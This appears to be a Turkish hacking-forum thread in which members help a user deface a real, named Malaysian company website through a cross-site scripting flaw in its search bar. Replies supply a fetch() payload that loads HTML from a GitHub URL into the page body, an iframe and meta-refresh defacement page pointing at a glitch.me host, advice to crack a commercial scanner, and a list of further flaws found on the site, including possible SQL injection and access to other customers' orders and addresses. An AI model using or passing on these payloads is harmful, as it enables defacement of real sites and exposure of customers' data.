Xss açığı olan sitenin indexini değiştirme

H

hidrhyme

Yeni üye
25 May 2024
35
9
Beyler xss açığı olan bir site buldum arama cubuguna yazdıgın javascript kodunu çalıştırıyor (<script>alert();</script> falan) bu sitenin indexini bu şekilde değiştirlebilirmiyim? adam düzeltene kadar benım yazdıgım ındex uzerınde calıssın sıte.

Düzenleme: beyler şimdi kesfettim yazıdıgın html kodlarınıda gerçekleştiriyor millet gerçekten site yapmasını bilmiyor xD,
 
Son düzenleme:
Tarihe göre sırala Oylara göre sırala
'Herodot

'Herodot

Katılımcı Üye
30 Eyl 2017
487
299
Kuvâ-yi Milliye
Selam,

script fetch ile index yürütebilirsin.

Örneğin benim index;

Kod: 
<script>fetch("https://raw.githubusercontent.com/Herodotht/Testing/main/index.html").then(response=>response.text()).then(html=>document.body.innerhtml=html);</script>


Bu JavaScript kod bloğu, bir web sayfasında çalıştırıldığında, belirtilen URL'den bir HTML dosyası alır ve bu dosyanın içeriğini mevcut web sayfasının içeriğiyle değiştirir.

İşlemler şu şekilde gerçekleşir:

  1. fetch() fonksiyonu, belirtilen URL'den veri almak için kullanılır. Bu durumda, GitHub'da belirtilen URL'den bir HTML dosyası alınmaya çalışılıyor.
  2. fetch() fonksiyonu, sunucudan gelen yanıtı temsil eden bir promise döndürür. Bu promise başarıyla tamamlanırsa, yanıtın metin içeriğini temsil eden bir başka promise döndürür.
  3. İkinci .then() yöntemi, bu metin içeriğini alır ve bu içeriği mevcut web sayfasının <body> bölümünün içeriğiyle değiştirir.
Sonuç olarak, bu kod bloğu, bir HTML dosyasının içeriğini dinamik olarak başka bir web sayfasına eklemek veya değiştirmek için kullanılabilir. Bu, web sayfalarının içeriğini güncellemek veya dinamik olarak yüklemek için yaygın olarak kullanılan bir tekniktir.
 
Son düzenleme:
Oyla 0 Downvote
H

hidrhyme

Yeni üye
25 May 2024
35
9
'Herodot' Alıntı:
Türk sitesine bunu yapmanı önermem, diğer ülkelere yapıştır gitsin.
Genişletmek için tıkla ...
İndonezya sitesi, türk sitesine yapmam zaten.

'Herodot' Alıntı:
Selam,

script fetch ile index yürütebilirsin.

Örneğin benim index;

Kod: 
<script>fetch("https://raw.githubusercontent.com/Herodotht/Testing/main/index.html").then(response=>response.text()).then(html=>document.body.innerhtml=html);</script>
Genişletmek için tıkla ...
Kral kodu çalıştırdım da site eskisi gibi değişen bir şey yok suan
 
Oyla 0 Downvote
boyka48

boyka48

Yeni üye
7 Nis 2013
39
4
alert("Artık Burdayım")
hidrhyme' Alıntı:
Beyler xss açığı olan bir site buldum arama cubuguna yazdıgın javascript kodunu çalıştırıyor (<script>alert();</script> falan) bu sitenin indexini bu şekilde değiştirlebilirmiyim? adam düzeltene kadar benım yazdıgım ındex uzerınde calıssın sıte.

Düzenleme: beyler şimdi kesfettim yazıdıgın html kodlarınıda gerçekleştiriyor millet gerçekten site yapmasını bilmiyor xD,
Genişletmek için tıkla ...
İframe Kullanarak Yapabilirsin Eğer Kalıcı Xss ise Yapabilirsin Sana Örnek Meta kodunu göndereyim
 
Oyla 0 Downvote
H

hidrhyme

Yeni üye
25 May 2024
35
9
boyka48' Alıntı:
İframe Kullanarak Yapabilirsin Eğer Kalıcı Xss ise Yapabilirsin Sana Örnek Meta kodunu göndereyim
Genişletmek için tıkla ...
Meta kodunu gönderirsen cok güzel olur kral, teşekkürler.
Kalıcı xss mi bilmiyorum alert() yazıyorum çalışıyor.

Beyler site bu, alert yazıyorum falan calısıyor ama fetch komutunu yazıyorum tepki vermiyor

JARED

Smart soft Enterprise
jared.com.my jared.com.my
nasıl yapacagım cözemedim açık arama cubugunda @boyka48 @CommandBEY @'Herodot
 
Oyla 0 Downvote
H

hidrhyme

Yeni üye
25 May 2024
35
9
'Herodot' Alıntı:
URL'de decoding işlemi uygulanıyor mu ? Post isteklerini mi manipüle ediyorsun ?

Şimdi kafanı fazla karıştırmak istemiyorum, Kali Linux'a Acunetix cracklayabilirsen sana nereye nasıl enjekte edebileceğini gösteriyor.
Cracklerken RAT yemeyelim dikkat.
Genişletmek için tıkla ...
Acutenix'i bilmiyorum sadece bir yerde duymuştum, bir de suan kali yok bende vmware dosyaları sılındı :C

'Herodot' Alıntı:
Selam,

script fetch ile index yürütebilirsin.

Örneğin benim index;

Kod: 
<script>fetch("https://raw.githubusercontent.com/Herodotht/Testing/main/index.html").then(response=>response.text()).then(html=>document.body.innerhtml=html);</script>


Bu JavaScript kod bloğu, bir web sayfasında çalıştırıldığında, belirtilen URL'den bir HTML dosyası alır ve bu dosyanın içeriğini mevcut web sayfasının içeriğiyle değiştirir.

İşlemler şu şekilde gerçekleşir:

  1. fetch() fonksiyonu, belirtilen URL'den veri almak için kullanılır. Bu durumda, GitHub'da belirtilen URL'den bir HTML dosyası alınmaya çalışılıyor.
  2. fetch() fonksiyonu, sunucudan gelen yanıtı temsil eden bir promise döndürür. Bu promise başarıyla tamamlanırsa, yanıtın metin içeriğini temsil eden bir başka promise döndürür.
  3. İkinci .then() yöntemi, bu metin içeriğini alır ve bu içeriği mevcut web sayfasının <body> bölümünün içeriğiyle değiştirir.
Sonuç olarak, bu kod bloğu, bir HTML dosyasının içeriğini dinamik olarak başka bir web sayfasına eklemek veya değiştirmek için kullanılabilir. Bu, web sayfalarının içeriğini güncellemek veya dinamik olarak yüklemek için yaygın olarak kullanılan bir tekniktir.
Genişletmek için tıkla ...
Bide kral simdi farkettim innerhtml yerine innerHTML olması gerekiyormuş çalışmıyor öbür türlü.,
kodu arama cubuguna girince sadece kendi bilgisayarım üstünde böyle gözüküyor, sitedeki çerezleri silince gidiyor.
 
Oyla 0 Downvote
Rapx13

Rapx13

Anka Team Junior
1 Kas 2023
119
48
Atamın İzinde
hidrhyme' Alıntı:
Beyler xss açığı olan bir site buldum arama cubuguna yazdıgın javascript kodunu çalıştırıyor (<script>alert();</script> falan) bu sitenin indexini bu şekilde değiştirlebilirmiyim? adam düzeltene kadar benım yazdıgım ındex uzerınde calıssın sıte.

Düzenleme: beyler şimdi kesfettim yazıdıgın html kodlarınıda gerçekleştiriyor millet gerçekten site yapmasını bilmiyor xD,
Genişletmek için tıkla ...
Sen biliyonmu site yapmasını. Ayrıca indexi o şekilde değiştiremezsin.

hidrhyme' Alıntı:
Beyler xss açığı olan bir site buldum arama cubuguna yazdıgın javascript kodunu çalıştırıyor (<script>alert();</script> falan) bu sitenin indexini bu şekilde değiştirlebilirmiyim? adam düzeltene kadar benım yazdıgım ındex uzerınde calıssın sıte.

Düzenleme: beyler şimdi kesfettim yazıdıgın html kodlarınıda gerçekleştiriyor millet gerçekten site yapmasını bilmiyor xD,
Genişletmek için tıkla ...
Niye değiştiremeyiceğini anlatıyım sabah düzelten kişi şuanda önlemini almıştır almadıysa bas gitsin
 
Oyla 0 Downvote
boyka48

boyka48

Yeni üye
7 Nis 2013
39
4
alert("Artık Burdayım")
hidrhyme' Alıntı:
Meta kodunu gönderirsen cok güzel olur kral, teşekkürler.
Kalıcı xss mi bilmiyorum alert() yazıyorum çalışıyor.
Genişletmek için tıkla ...

hidrhyme' Alıntı:
Meta kodunu gönderirsen cok güzel olur kral, teşekkürler.
Kalıcı xss mi bilmiyorum alert() yazıyorum çalışıyor.

Beyler site bu, alert yazıyorum falan calısıyor ama fetch komutunu yazıyorum tepki vermiyor

JARED

Smart soft Enterprise
jared.com.my jared.com.my
nasıl yapacagım cözemedim açık arama cubugunda @boyka48 @CommandBEY @'Herodot
Genişletmek için tıkla ...
İletiyorum

hidrhyme' Alıntı:
Beyler xss açığı olan bir site buldum arama cubuguna yazdıgın javascript kodunu çalıştırıyor (<script>alert();</script> falan) bu sitenin indexini bu şekilde değiştirlebilirmiyim? adam düzeltene kadar benım yazdıgım ındex uzerınde calıssın sıte.

Düzenleme: beyler şimdi kesfettim yazıdıgın html kodlarınıda gerçekleştiriyor millet gerçekten site yapmasını bilmiyor xD,
Genişletmek için tıkla ...

Aşşağıdaki kodda glitch den kodlarını yapıştır yayınla URL kopyala sonrasında

Olan yerleri kendi glitch linkini koy


SORUNSUZ BİR ŞEKİLDE ÇALIŞIR GERİ DÖNÜŞ YAP

HTML: 
<html style="font-size: 16px;" class="u-responsive-md"><head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta property="og:title" content="Boyka">
<meta property="og:description" content="Boyka">
<meta property="og:image" content="">
<meta property="og:url" content="">
<meta name="twitter:card" content="summary_large_image">
<title>Boyka</title></head>
<iframe src="https://imparl-carnelian-silene.glitch.me" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;">
<meta http-equiv="refresh" content="1;URL=https://imparl-carnelian-silene.glitch.me"/>
</iframe>
 
Oyla 0 Downvote
Mamilate

Mamilate

Üye
12 Kas 2023
208
82
hidrhyme' Alıntı:
Meta kodunu gönderirsen cok güzel olur kral, teşekkürler.
Kalıcı xss mi bilmiyorum alert() yazıyorum çalışıyor.

Beyler site bu, alert yazıyorum falan calısıyor ama fetch komutunu yazıyorum tepki vermiyor

JARED

Smart soft Enterprise
jared.com.my jared.com.my
nasıl yapacagım cözemedim açık arama cubugunda @boyka48 @CommandBEY @'Herodot
Genişletmek için tıkla ...
arama çubuğu kısmında reflected xss var yani kalıcı olarak değiştiremezsin, ayrıca azıcık baktım blind sql de var gibi (çok detaylı bakmadım hatalı olabilir) eğer database çekersen bir şekilde admin panele erişip index değiştirebilirsin

biraz daha kurcaladım sitede xss den başka açıklar da var :)
fiyat manipülasyonu
başkalarının sepetini, siparişini, adresini görme
kendini başka kullanıcı yapma vs.
daha fazla da vardır illa 5 dakikalık araştırma sonucu bu :)
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.